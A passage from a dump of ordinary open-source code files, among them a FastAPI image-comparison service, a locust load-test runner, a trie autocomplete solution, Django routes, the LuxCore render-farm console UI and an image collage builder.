process_images(Type_Enum.GRAYSCALE)\n\n img_route_1 = f\"{IMAGES_PATH}/processed/input-{mod_name}.png\"\n img_route_2 = f\"{IMAGES_PATH}/processed/target-{mod_name}.png\"\n\n print(\"Images saved\")\n\n return comparator.compare(image_1=img_route_1, image_2=img_route_2), image_size\n\n@app.get(\"/\")\ndef read_root():\n return {\"message\": \"Hello, CORS is enabled\"}\n@app.get(\"/status\")\nasync def status():\n return StatusResponse(status=\"ok\", description=\"Service for image comparison through embedding\", model_name=SETTINGS.name_of_model)\n\n@app.get('/reports-json')\nasync def reports_json():\n return entries\n\n@app.get('/reports')\nasync def export_csv():\n if not entries:\n raise 
HTTPException(status_code=404, detail=\"No data available\")\n\n csv_data = StringIO()\n csv_writer = csv.DictWriter(\n csv_data,\n fieldnames=[\n \"id\",\n \"date\",\n \"image_input\",\n \"image_input_size\",\n \"image_target\",\n \"similarity\",\n \"time_ms\",\n \"model\",\n ],\n )\n csv_writer.writeheader()\n csv_writer.writerows(entries)\n\n response = StreamingResponse(\n iter([csv_data.getvalue()]),\n media_type=\"text/csv\",\n headers={\n \"Content-Disposition\": \"attachment;filename=reports.csv\",\n },\n )\n\n return response\n\n\n@app.post(\"/predict\")\ndef compare_images(\n file_1: UploadFile = File(...), \n file_2: int = 0, \n file_number: int = 1,\n comparator: Comparator = Depends(get_comparator)\n) -> Comparison:\n file_2_image = images_dict[file_2]\n print(file_2_image)\n print(\"Comparing images...\")\n result, image_size = upload_and_compare(file_1, file_2_image, comparator, file_number)\n entries.append(create_entry(result, file_1, image_size, file_2_image))\n print(f\"{result.similarity*100}% similarity between {file_1.filename} and target\")\n return result\n\nif __name__ == \"__main__\":\n import uvicorn\n uvicorn.run(\"app:app\", host=\"127.0.0.1\", port=8001, reload=True) ","repo_name":"MauriVargas17/Act-This-Page","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19133030376","text":"import subprocess\r\nimport sys\r\nimport traceback\r\n\r\n\r\ndef run_load_Test(url, users, ramp_up_rate, run_time):\r\n try:\r\n subprocess.run([\"locust\", \"-f\", \"load_test.py\", \"--csv=test\", \"--headless\", f\"--host={url}\",'-u', f\"{users}\",'-r', f\"{ramp_up_rate}\", '--run-time', f\"{run_time}\" ], check=True)\r\n print(\"Load test completed successfully!\")\r\n except subprocess.CalledProcessError:\r\n print(\"An error occurred while running the site test.\")\r\n return \r\n\r\ndef run_build_test():\r\n try:\r\n subprocess.run([\"python\", \"load_test_file_builder.py\"], check=True)\r\n print(\"Load test file build completed successfully!\")\r\n except subprocess.CalledProcessError:\r\n print(\"An error occurred while running theload test builder.\")\r\n\r\ndef run_site_test(site_name, output_name):\r\n try:\r\n subprocess.run([\"python\", \"SiteTester.py\", site_name, output_name], check=True)\r\n print(\"Site test completed successfully!\")\r\n except subprocess.CalledProcessError:\r\n print(\"An error occurred while running the site test.\")\r\n\r\ndef run_report_builder():\r\n try:\r\n subprocess.run([\"python\", \"ReportBuilder.py\"], check=True)\r\n print(\"Report Builder completed successfully!\")\r\n except subprocess.CalledProcessError:\r\n print(\"An error occurred while running the report builder.\")\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n #python RunAllTests.py -site -users -ramp_up_rate -test_time(seconds)\r\n run_site_test(str(sys.argv[1]), \"sitetestresults.csv\")\r\n run_build_test()\r\n run_load_Test(str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(sys.argv[4]))\r\n run_report_builder()\r\n except Exception as e:\r\n print(f\"Error - {e}\")\r\n traceback.print_exc()","repo_name":"darichards10/WebsiteTester","sub_path":"RunAllTests.py","file_name":"RunAllTests.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"43209759622","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\nfrom travelport.models.rail_journey import RailJourney\n\n__NAMESPACE__ = \"http://www.travelport.com/schema/rail_v52_0\"\n\n\n@dataclass\nclass RailJourneyList:\n \"\"\"\n List of Rail Journeys.\n \"\"\"\n class Meta:\n namespace = \"http://www.travelport.com/schema/rail_v52_0\"\n\n rail_journey: list[RailJourney] = field(\n default_factory=list,\n metadata={\n \"name\": \"RailJourney\",\n \"type\": \"Element\",\n \"max_occurs\": 999,\n }\n )\n","repo_name":"tefra/xsdata-samples","sub_path":"travelport/models/rail_journey_list.py","file_name":"rail_journey_list.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"10704275842","text":"class node:\r\n def __init__(self):\r\n self.trie = dict()\r\n \r\n def insert(self, line):\r\n now = self.trie\r\n for c in line:\r\n if c not in now:\r\n now[c] = [1,dict()]\r\n else:\r\n now[c][0] += 1\r\n now = now[c][1]\r\n \r\n def show(self):\r\n print(self.trie)\r\n \r\n def find(self, line):\r\n depth = 1\r\n now = self.trie\r\n for c in line[:-1]:\r\n if now[c][0] == 1:\r\n break\r\n now = now[c][1]\r\n depth += 1\r\n \r\n #print(line, depth)\r\n return depth\r\n\r\ndef solution(words):\r\n answer = 0\r\n n = node()\r\n for word in words:\r\n n.insert(word)\r\n #n.show()\r\n for word in words:\r\n answer += n.find(word)\r\n return answer","repo_name":"LINDBURG/Programmers","sub_path":"2018_KBR_자동완성.py","file_name":"2018_KBR_자동완성.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10668525811","text":"#Groups URLS.py file\nfrom django.urls import path, re_path\nfrom groups import views\n\napp_name = 'groups'\n\nurlpatterns = [\n path('',views.ListGroups.as_view(),name='all'),\n path('create',views.CreateGroup.as_view(),name='create'),\n path('post/in/',views.SingleGroup.as_view(),name='single'),\n # re_path('posts/in/(?P[-\\w]+)/$',views.SingleGroup.as_view(),name='single'),\n path('join/',views.JoinGroup.as_view(),name='join'),\n path('leave/',views.LeaveGroup.as_view(),name='leave')\n]\n","repo_name":"Shahbaaz16/GroupsProj","sub_path":"socialMedia/groups/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"6457185484","text":"import sys\nimport time\nimport logging\nimport functools\nimport socket\n\n# For some unknown reason, I need to import pyluxcore before PySide2 or\n# it will break streams and parsing in an unpredictable way\nimport pyluxcore\n\ntry:\n\timport PySide.QtCore as QtCore\n\timport PySide.QtGui as QtGui\n\timport PySide.QtGui as QtWidgets\n\tPYSIDE_V = int(QtCore.qVersion()[:1])\nexcept ImportError:\n\ttry:\n\t\tfrom PySide2 import QtGui, QtCore, QtWidgets\n\t\tPYSIDE_V = int(QtCore.qVersion()[:1])\n\texcept ImportError:\n\t\tfrom PySide6 import QtGui, QtCore, QtWidgets\n\t\tPYSIDE_V = int(QtCore.qVersion()[:1])\n\nimport pyluxcoretools.renderfarm.renderfarm as renderfarm\nimport pyluxcoretools.renderfarm.renderfarmjobsingleimage as jobsingleimage\nimport pyluxcoretools.utils.loghandler as loghandler\nfrom pyluxcoretools.utils.logevent import LogEvent\nimport pyluxcoretools.utils.uiloghandler as uiloghandler\nimport pyluxcoretools.utils.netbeacon as netbeacon\nimport pyluxcoretools.pyluxcorenetconsole.mainwindow as mainwindow\nimport pyluxcoretools.pyluxcorenetconsole.addnodedialog as addnodedialog\n\nlogger = logging.getLogger(loghandler.loggerName + \".luxcorenetconsoleui\")\n\nclass CurrentJobUpdateEvent(QtCore.QEvent):\n\tEVENT_TYPE = QtCore.QEvent.Type(QtCore.QEvent.registerEventType())\n\n\tdef __init__(self):\n\t\tsuper(CurrentJobUpdateEvent, self).__init__(self.EVENT_TYPE)\n\nclass JobsUpdateEvent(QtCore.QEvent):\n\tEVENT_TYPE = QtCore.QEvent.Type(QtCore.QEvent.registerEventType())\n\n\tdef __init__(self):\n\t\tsuper(JobsUpdateEvent, self).__init__(self.EVENT_TYPE)\n\nclass NodesUpdateEvent(QtCore.QEvent):\n\tEVENT_TYPE = QtCore.QEvent.Type(QtCore.QEvent.registerEventType())\n\n\tdef __init__(self):\n\t\tsuper(NodesUpdateEvent, self).__init__(self.EVENT_TYPE)\n\nclass QueuedJobsTableModel(QtCore.QAbstractTableModel):\n\tdef __init__(self, parent, renderFarm, * args):\n\t\tQtCore.QAbstractTableModel.__init__(self, parent, * args)\n\t\tself.renderFarm = renderFarm\n\n\tdef rowCount(self, parent):\n\t\treturn self.renderFarm.GetQueuedJobCount()\n\n\tdef columnCount(self, parent):\n\t\treturn 2\n\n\tdef data(self, index, role):\n\t\tif not index.isValid():\n\t\t\treturn None\n\t\telif role != QtCore.Qt.DisplayRole:\n\t\t\treturn None\n\t\telse:\n\t\t\tif index.column() == 0:\n\t\t\t\treturn index.row()\n\t\t\telif index.column() == 1:\n\t\t\t\treturn self.renderFarm.GetQueuedJobList()[index.row()].GetRenderConfigFileName()\n\t\t\telse:\n\t\t\t\treturn \"\"\n\n\tdef headerData(self, col, orientation, role):\n\t\tif orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:\n\t\t\tif col == 0:\n\t\t\t\treturn \"#\";\n\t\t\telif col == 1:\n\t\t\t\treturn \"Render configuration\"\n\t\t\telse:\n\t\t\t\treturn \"\"\n\t\treturn None\n\n\tdef Update(self):\n\t\tself.emit(QtCore.SIGNAL(\"layoutChanged()\"))\n\nclass NodesTableModel(QtCore.QAbstractTableModel):\n\tdef __init__(self, parent, renderFarm, * args):\n\t\tQtCore.QAbstractTableModel.__init__(self, parent, * args)\n\t\tself.renderFarm = renderFarm\n\n\tdef rowCount(self, parent):\n\t\treturn self.renderFarm.GetNodesListCount()\n\n\tdef columnCount(self, parent):\n\t\treturn 3\n\n\tdef data(self, index, role):\n\t\tif not index.isValid():\n\t\t\treturn None\n\t\telif role != QtCore.Qt.DisplayRole:\n\t\t\treturn None\n\t\telse:\n\t\t\tif index.column() == 0:\n\t\t\t\treturn index.row()\n\t\t\telif index.column() == 1:\n\t\t\t\tnode = self.renderFarm.GetNodesList()[index.row()]\n\n\t\t\t\treturn 
node.GetKey()\n\t\t\telif index.column() == 2:\n\t\t\t\tnode = self.renderFarm.GetNodesList()[index.row()]\n\n\t\t\t\treturn node.state.name\n\t\t\telse:\n\t\t\t\treturn \"\"\n\n\tdef headerData(self, col, orientation, role):\n\t\tif orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:\n\t\t\tif col == 0:\n\t\t\t\treturn \"#\";\n\t\t\telif col == 1:\n\t\t\t\treturn \"Rendering node address\"\n\t\t\telif col == 2:\n\t\t\t\treturn \"Status\"\n\t\t\telse:\n\t\t\t\treturn \"\"\n\n\t\treturn None\n\n\tdef Update(self):\n\t\tself.emit(QtCore.SIGNAL(\"layoutChanged()\"))\n\nclass AddNodeDialog(QtWidgets.QDialog, addnodedialog.Ui_DialogAddNode):\n\tdef __init__(self, parent = None):\n\t\tsuper(AddNodeDialog, self).__init__(parent)\n\t\tself.setupUi(self)\n\n\t\tif PYSIDE_V >= 6:\n\t\t\tipRegExp = QtCore.QRegularExpression(\"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$\")\n\t\t\tipRegExpVal = QtGui.QRegularExpressionValidator(ipRegExp)\n\t\telse:\n\t\t\tipRegExp = QtCore.QRegExp(\"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$\")\n\t\t\tipRegExpVal = QtGui.QRegExpValidator(ipRegExp)\n\t\tself.lineEditIPAddress.setValidator(ipRegExpVal)\n\t\tself.lineEditPort.setValidator(QtGui.QIntValidator(0, 65535))\n\t\tself.lineEditPort.setText(str(renderfarm.DEFAULT_PORT))\n\n\t\tif PYSIDE_V < 5:\n\t\t\tself.move(QtWidgets.QApplication.desktop().screen().rect().center()- self.rect().center())\n\t\t\n\tdef GetIPAddress(self):\n\t\treturn self.lineEditIPAddress.text()\n\t\n\tdef GetPort(self):\n\t\treturn self.lineEditPort.text()\n\t\t\n\nclass MainApp(QtWidgets.QMainWindow, mainwindow.Ui_MainWindow, logging.Handler):\n\tdef __init__(self, parent=None):\n\t\tsuper(MainApp, self).__init__(parent)\n\t\tself.setupUi(self)\n\n\t\tif PYSIDE_V < 5:\n\t\t\tself.move(QtWidgets.QApplication.desktop().screen().rect().center()- self.rect().center())\n\t\t\n\t\tuiloghandler.AddUILogHandler(loghandler.loggerName, self)\n\t\t\n\t\tself.tabWidgetMain.setTabEnabled(0, False)\n\t\tself.tabWidgetMain.setCurrentIndex(1)\n\t\t\n\t\tself.lineEditHaltSPP.setValidator(QtGui.QIntValidator(0, 9999999))\n\t\tself.lineEditHaltTime.setValidator(QtGui.QIntValidator(0, 9999999))\n\t\tself.lineEditFilmUpdatePeriod.setValidator(QtGui.QIntValidator(0, 9999999))\n\t\tself.lineEditStatsPeriod.setValidator(QtGui.QIntValidator(1, 9999999))\n\n\t\tlogger.info(\"LuxCore %s\" % pyluxcore.Version())\n\t\t\n\t\t#-----------------------------------------------------------------------\n\t\t# Create the render farm\n\t\t#-----------------------------------------------------------------------\n\n\t\tself.renderFarm = renderfarm.RenderFarm()\n\t\tself.renderFarm.Start()\n\t\t\n\t\t#-----------------------------------------------------------------------\n\t\t# Start the beacon receiver\n\t\t#-----------------------------------------------------------------------\n\t\t\n\t\tself.beacon = netbeacon.NetBeaconReceiver(functools.partial(MainApp.__NodeDiscoveryCallBack, self))\n\t\tself.beacon.Start()\n\t\t\n\t\t#-----------------------------------------------------------------------\n\t\t# Create the queued jobs widget table\n\t\t#-----------------------------------------------------------------------\n\n\t\tself.queuedJobsTableModel = QueuedJobsTableModel(self, self.renderFarm)\n\t\tself.queuedJobsTableView = 
QtWidgets.QTableView()\n\t\tself.queuedJobsTableView.setModel(self.queuedJobsTableModel)\n\t\tself.queuedJobsTableView.resizeColumnsToContents()\n\n\t\tself.vboxLayoutQueuedJobs = QtWidgets.QVBoxLayout(self.scrollAreaQueuedJobs)\n\t\tself.vboxLayoutQueuedJobs.setObjectName(\"vboxLayoutQueuedJobs\")\n\t\tself.vboxLayoutQueuedJobs.addWidget(self.queuedJobsTableView)\n\t\tself.scrollAreaQueuedJobs.setLayout(self.vboxLayoutQueuedJobs)\n\n\t\t#-----------------------------------------------------------------------\n\t\t# Create the nodes widget table\n\t\t#-----------------------------------------------------------------------\n\n\t\tself.nodesTableModel = NodesTableModel(self, self.renderFarm)\n\t\tself.nodesTableView = QtWidgets.QTableView()\n\t\tself.nodesTableView.setModel(self.nodesTableModel)\n\t\tself.nodesTableView.resizeColumnsToContents()\n\n\t\tself.vboxLayoutNodes = QtWidgets.QVBoxLayout(self.scrollAreaNodes)\n\t\tself.vboxLayoutNodes.setObjectName(\"vboxLayoutNodes\")\n\t\tself.vboxLayoutNodes.addWidget(self.nodesTableView)\n\t\tself.scrollAreaNodes.setLayout(self.vboxLayoutNodes)\n\n\t\t#-----------------------------------------------------------------------\n\n\t\tself.renderFarm.SetJobsUpdateCallBack(functools.partial(MainApp.__RenderFarmJobsUpdateCallBack, self))\n\t\tself.__RenderFarmJobsUpdateCallBack()\n\t\t\n\t\tself.renderFarm.SetNodesUpdateCallBack(functools.partial(MainApp.__RenderFarmNodesUpdateCallBack, self))\n\t\tself.__RenderFarmNodesUpdateCallBack()\n\n\tdef PrintMsg(self, msg):\n\t\tQtCore.QCoreApplication.postEvent(self, LogEvent(msg))\n\n\tdef __FormatSamplesSec(self, val):\n\t\tif val < 1000000.0:\n\t\t\treturn \"%.1f\" % (val / 1000.0) + \"K\"\n\t\telse:\n\t\t\treturn \"%.1f\" % (val / 1000000.0) + \"M\"\n\n\tdef __NodeDiscoveryCallBack(self, ipAddress, port):\n\t\tself.renderFarm.DiscoveredNode(ipAddress, port, renderfarm.NodeDiscoveryType.AUTO_DISCOVERED)\n\n\tdef __RenderFarmJobsUpdateCallBack(self):\n\t\tQtCore.QCoreApplication.postEvent(self, JobsUpdateEvent())\n\n\tdef __RenderFarmNodesUpdateCallBack(self):\n\t\tQtCore.QCoreApplication.postEvent(self, NodesUpdateEvent())\n\n\tdef __CurrentJobUpdateCallBack(self):\n\t\tQtCore.QCoreApplication.postEvent(self, CurrentJobUpdateEvent())\n\n\tdef __UpdateNodesTab(self):\n\t\tself.nodesTableModel.Update()\n\t\tself.nodesTableView.resizeColumnsToContents()\n\t\n\tdef __UpdateCurrentRenderingImage(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\t\t\n\t\tif currentJob:\n\t\t\tpixMap = QtGui.QPixmap(currentJob.GetImageFileName())\n\n\t\t\tif pixMap.isNull():\n\t\t\t\tself.labelRenderingImage.setPixmap(None)\n\t\t\t\tself.labelRenderingImage.setText(\"Waiting for film download and merge\")\n\t\t\t\tself.labelRenderingImage.show()\n\t\t\telse:\n\t\t\t\tself.labelRenderingImage.setPixmap(pixMap)\n\t\t\t\tself.labelRenderingImage.setText(\"\")\n\t\t\t\tself.labelRenderingImage.resize(pixMap.size())\n\t\t\t\tself.labelRenderingImage.show()\n\t\telse:\n\t\t\tself.labelRenderingImage.setPixmap(None)\n\t\t\tself.labelRenderingImage.setText(\"N/A\")\n\t\t\tself.labelRenderingImage.show()\n\n\tdef __UpdateCurrentJobTab(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\t\t\n\t\tif currentJob:\n\t\t\tself.tabWidgetMain.setTabEnabled(0, True)\n\t\t\t\n\t\t\tself.labelRenderCfgFileName.setText(\"\" + currentJob.GetRenderConfigFileName() + \" \")\n\t\t\tself.labelFilmFileName.setText(\"\" + currentJob.GetFilmFileName() + \" \")\n\t\t\tself.labelImageFileName.setText(\"\" + currentJob.GetImageFileName() + \" 
\")\n\t\t\tself.labelWorkDirectory.setText(\"\" + currentJob.GetWorkDirectory() + \" \")\n\t\t\t\n\t\t\trenderingStartTime = currentJob.GetStartTime()\n\t\t\tself.labelStartTime.setText(\"\" + time.strftime(\"%H:%M:%S %Y/%m/%d\", time.localtime(renderingStartTime)) + \" \")\n\n\t\t\tdt = time.time() - renderingStartTime\n\t\t\tself.labelRenderingTime.setText(\"\" + time.strftime(\"%H:%M:%S\", time.gmtime(dt)) + \" \")\n\t\t\tself.labelSamplesPixel.setText(\"\" + \"%.1f\" % (currentJob.GetSamplesPixel()) + \" \")\n\t\t\tself.labelSamplesSec.setText(\"\" + self.__FormatSamplesSec(currentJob.GetSamplesSec()) + \" \")\n\n\t\t\tself.lineEditHaltSPP.setText(str(currentJob.GetFilmHaltSPP()))\n\t\t\tself.lineEditHaltTime.setText(str(currentJob.GetFilmHaltTime()))\n\t\t\tself.lineEditFilmUpdatePeriod.setText(str(currentJob.GetFilmUpdatePeriod()))\n\t\t\tself.lineEditStatsPeriod.setText(str(currentJob.GetStatsPeriod()))\n\n\t\t\t# Update the RenderingImage\n\t\t\tself.__UpdateCurrentRenderingImage()\n\n\t\t\tcurrentJob.SetJobUpdateCallBack(self.__CurrentJobUpdateCallBack)\n\t\telse:\n\t\t\tself.tabWidgetMain.setTabEnabled(0, False)\n\t\n\tdef __UpdateQueuedJobsTab(self):\n\t\tself.queuedJobsTableModel.Update()\n\t\tself.queuedJobsTableView.resizeColumnsToContents()\n\n\tdef clickedAddNode(self):\n\t\tdialog = AddNodeDialog(self)\n\t\tif dialog.exec_() == QtWidgets.QDialog.Accepted:\n\t\t\tipAddress = dialog.GetIPAddress()\n\t\t\tport = dialog.GetPort()\n\n\t\t\t# Check if it is a valid ip address\n\t\t\ttry:\n\t\t\t\tsocket.inet_aton(ipAddress)\n\t\t\texcept socket.error:\n\t\t\t\traise SyntaxError(\"Rendering node ip address syntax error: \" + node)\n\n\t\t\t# Check if it is a valid port\n\t\t\ttry:\n\t\t\t\tport = int(port)\n\t\t\texcept ValueError:\n\t\t\t\traise SyntaxError(\"Rendering node port syntax error: \" + node)\n\t\t\t\n\t\t\tself.renderFarm.DiscoveredNode(ipAddress, port, renderfarm.NodeDiscoveryType.MANUALLY_DISCOVERED)\n\n\tdef clickedAddJob(self):\n\t\tfileToRender, _ = QtWidgets.QFileDialog.getOpenFileName(parent=self,\n\t\t\t\tcaption='Open file to render', filter=\"Binary render configuration (*.bcf)\")\n\t\t\n\t\tif fileToRender:\n\t\t\tlogger.info(\"Creating single image render farm job: \" + fileToRender);\n\t\t\trenderFarmJob = jobsingleimage.RenderFarmJobSingleImage(self.renderFarm, fileToRender)\n\t\t\tself.renderFarm.AddJob(renderFarmJob)\n\t\t\n\t\t\tself.__UpdateCurrentJobTab()\n\t\t\tself.__UpdateQueuedJobsTab()\n\t\t\n\t\t\tself.tabWidgetMain.setCurrentIndex(0)\n \n\tdef clickedRemovePendingJobs(self):\n\t\tself.renderFarm.RemovePendingJobs()\n\t\tself.__UpdateQueuedJobsTab()\n\n\tdef editedHaltSPP(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\n\t\tif currentJob:\n\t\t\tval = max(0, int(self.lineEditHaltSPP.text()))\n\t\t\tcurrentJob.SetFilmHaltSPP(val)\n\t\t\tlogger.info(\"Halt SPP changed to: %d\" % val)\n\n\tdef editedHaltTime(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\n\t\tif currentJob:\n\t\t\tval = max(0, int(self.lineEditHaltTime.text()))\n\t\t\tcurrentJob.SetFilmHaltTime(val)\n\t\t\tlogger.info(\"Halt time changed to: %d\" % val)\n\n\tdef editedFilmUpdatePeriod(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\n\t\tif currentJob:\n\t\t\tval = max(10, int(self.lineEditFilmUpdatePeriod.text()))\n\t\t\tcurrentJob.SetFilmUpdatePeriod(val)\n\t\t\tlogger.info(\"Film update period changed to: %d\" % val)\n\t\t\n\tdef editedStatsPeriod(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\n\t\tif currentJob:\n\t\t\tval = max(1, 
int(self.lineEditStatsPeriod.text()))\n\t\t\tcurrentJob.SetStatsPeriod(val)\n\t\t\tlogger.info(\"Statistics period changed to: %d\" % val)\n\n\tdef clickedForceFilmMerge(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\n\t\tif currentJob:\n\t\t\tcurrentJob.ForceFilmMerge()\n\n\tdef clickedForceFilmDownload(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\n\t\tif currentJob:\n\t\t\tcurrentJob.ForceFilmDownload()\n\n\tdef clickedFinishJob(self):\n\t\tself.renderFarm.StopCurrentJob()\n\t\tself.__UpdateCurrentJobTab()\n\t\tself.__UpdateQueuedJobsTab()\n\n\tdef clickedRefreshNodesList(self):\n\t\tself.__RenderFarmNodesUpdateCallBack()\n\n\tdef clickedQuit(self):\n\t\tself.close()\n\n\tdef closeEvent(self, event):\n\t\t# Stop the beacon receiver\n\t\tself.beacon.Stop()\n\n\t\t# Stop the render farm\n\t\tself.renderFarm.Stop()\n\n\t\tevent.accept()\n\n\tdef event(self, event):\n\t\tif event.type() == LogEvent.EVENT_TYPE:\n\t\t\tself.textEditLog.moveCursor(QtGui.QTextCursor.End)\n\t\t\tif event.isHtml:\n\t\t\t\tself.textEditLog.insertHtml(event.msg)\n\t\t\t\tself.textEditLog.insertPlainText(\"\\n\")\n\t\t\telse:\n\t\t\t\tself.textEditLog.insertPlainText(event.msg)\n\t\t\t\t\n\t\t\t\t# Show few specific messages on the status bar\n\t\t\t\tif event.msg.startswith(\"Waiting for a new connection\") or \\\n\t\t\t\t\t\tevent.msg.startswith(\"Started\") or \\\n\t\t\t\t\t\tevent.msg.startswith(\"Waiting for configuration...\"):\n\t\t\t\t\tself.statusbar.showMessage(event.msg)\n\n\t\t\treturn True\n\t\telif event.type() == CurrentJobUpdateEvent.EVENT_TYPE:\n\t\t\tself.__UpdateCurrentJobTab()\n\t\telif event.type() == JobsUpdateEvent.EVENT_TYPE:\n\t\t\tself.__UpdateCurrentJobTab()\n\t\t\tself.__UpdateQueuedJobsTab()\n\t\telif event.type() == NodesUpdateEvent.EVENT_TYPE:\n\t\t\tself.__UpdateNodesTab()\n\n\t\t\treturn True\n\n\t\treturn QtWidgets.QWidget.event(self, event)\n\ndef ui(app):\n\ttry:\n\t\tpyluxcore.Init(loghandler.LuxCoreLogHandler)\n\n\t\tform = MainApp()\n\t\tform.show()\n\t\t\n\t\tapp.exec_()\n\tfinally:\n\t\tpyluxcore.SetLogHandler(None)\n\ndef main(argv):\n\tapp = QtWidgets.QApplication(sys.argv)\n\tui(app)\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)\n","repo_name":"LuxCoreRender/LuxCore","sub_path":"src/pyluxcoretools/pyluxcoretools/pyluxcorenetconsole/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":15084,"program_lang":"python","lang":"en","doc_type":"code","stars":1047,"dataset":"github-code","pt":"70"}
+{"seq_id":"32819292996","text":"import sys\nimport os.path\nfrom PIL import Image, ImageOps, ImageEnhance\nimport logging\n\n\nclass Collage:\n def __init__(self, picture_list, background_path=\"images/background.jpg\", width=6048, height=4032, margin_border=5,\n margin_bottom=8, brightness_factor=1, contrast_factor=1):\n self.background_path = background_path\n self.width = width\n self.height = height\n self._open_or_create_background_image()\n self.picture_list = picture_list\n\n self.margin_border = margin_border\n self.margin_bottom = margin_bottom\n\n # Image enhacements for brightness and contrast\n self.brightness_factor = brightness_factor\n self.contrast_factor = contrast_factor\n\n # self.ratio = width / height # aspect ratio of background picture\n self.margin_width = int(self.width * self.margin_border / 100)\n self.margin_height = int(self.height * self.margin_border / 100)\n self.margin_bottom = int(self.height * self.margin_bottom / 100)\n\n @staticmethod\n def _resource_path(relative_path):\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\")\n\n return os.path.join(base_path, relative_path)\n\n def _open_or_create_background_image(self):\n if self.background_path is not None:\n if os.path.isfile(self.background_path):\n self.background = Image.open(self.background_path)\n bg_width, bg_height = self.background.size\n if bg_width != self.width or bg_height != self.height:\n logging.info(f\"Provided Background size does not fit to target size. Will resize background image for you \\r\\n\"\n f\"Background size: {bg_width} x {bg_height}, target size: {self.width} x {self.height}\")\n self.background = ImageOps.fit(self.background, (self.width, self.height))\n else:\n logging.warning(f\"Could not find Background image {self.background_path}. Will create a white background for you\")\n self.background = Image.new(\"RGB\", (self.width, self.height), \"white\")\n else:\n self.background = Image.new(\"RGB\", (self.width, self.height), \"white\")\n\n def _create_collage_list(self, amount, width, height):\n \"\"\"\n Creates a list containing actual images using the picture_list with the correct width and height.\n Automatically creates a placeholder image if not enough images available in list\n :param amount: amount of files which should be in the collage list\n :param width: target width of each collage picture\n :param height: target height of each collage picture\n :return: list of images with correct width and height\n \"\"\"\n collage_list = []\n # Create a list of collage pictures with correct width and height and crop image according to margins\n for x in range(-1, (amount + 1) * -1, -1):\n try:\n img_collage = Image.open(self.picture_list[x])\n except IndexError:\n # TODO: Alpha channel seems not to work, image becomes black\n logging.warning(f\"Index error while creating collage. 
Maybe not enough photos until now.\")\n img_collage = Image.new(\"RGB\", (10, 10), \"white\")\n except FileNotFoundError:\n logging.error(f\"Error: Could not find picture in picture list: {self.picture_list[x]}\")\n img_collage = Image.new(\"RGB\", (10, 10), \"white\")\n except Exception as e:\n logging.error(f\"Unknown Error: {e}\")\n logging.info(f\"Create empty image for you\")\n img_collage = Image.new(\"RGB\", (10, 10), \"white\")\n try:\n # Apply enhancements for brightness and contrast\n enhancer_brightness = ImageEnhance.Brightness(img_collage)\n img_enhanced_brightness = enhancer_brightness.enhance(self.brightness_factor)\n enhancer_contrast = ImageEnhance.Contrast(img_enhanced_brightness)\n img_enhanced_contrast = enhancer_contrast.enhance(self.contrast_factor)\n\n # Fit image to collage size\n img_collage = ImageOps.fit(img_enhanced_contrast, (width, height))\n collage_list.append(img_collage)\n except Exception as e:\n logging.error(f\"Create fallback image due to unhandled exception: {e}\")\n img_collage = Image.new(\"RGB\", (10, 10), \"black\")\n img_collage = ImageOps.fit(img_collage, (width, height))\n collage_list.append(img_collage)\n return collage_list\n\n def create_collage_2x2(self):\n # calculate width and height of each single collage picture according to border margin and bottom margin\n collage_picture_width = int(self.width / 2 - self.margin_width - 0.5 * self.margin_width)\n collage_picture_height = int(self.height / 2 - self.margin_height\n - 0.5 * self.margin_height - self.margin_bottom * 0.5)\n\n collage_list = self._create_collage_list(4, collage_picture_width, collage_picture_height)\n\n # take background image and paste each collage image on top of it with correct margin\n self.background.paste(collage_list[0], (self.margin_width, self.margin_height)) # top left\n self.background.paste(collage_list[1], (self.width - collage_picture_width - self.margin_width, self.margin_height)) # top right\n self.background.paste(collage_list[2], (self.margin_width, self.margin_height * 2 + collage_picture_height)) # bottom left\n self.background.paste(collage_list[3], (self.margin_width * 2 + collage_picture_width, self.margin_height * 2 + collage_picture_height)) # bottom right\n\n def create_collage_1x1(self):\n # calculate width and height of each single collage picture according to border margin and bottom margin\n collage_picture_width = int(self.width - 2 * self.margin_width)\n collage_picture_height = int(self.height - 2 * self.margin_height - self.margin_bottom)\n\n collage_list = self._create_collage_list(1, collage_picture_width, collage_picture_height)\n\n # take background image and paste each collage image on top of it with correct margin\n self.background.paste(collage_list[0], (self.margin_width, self.margin_height)) # top left\n\n def show_collage(self):\n self.background.show()\n\n def save_collage(self, 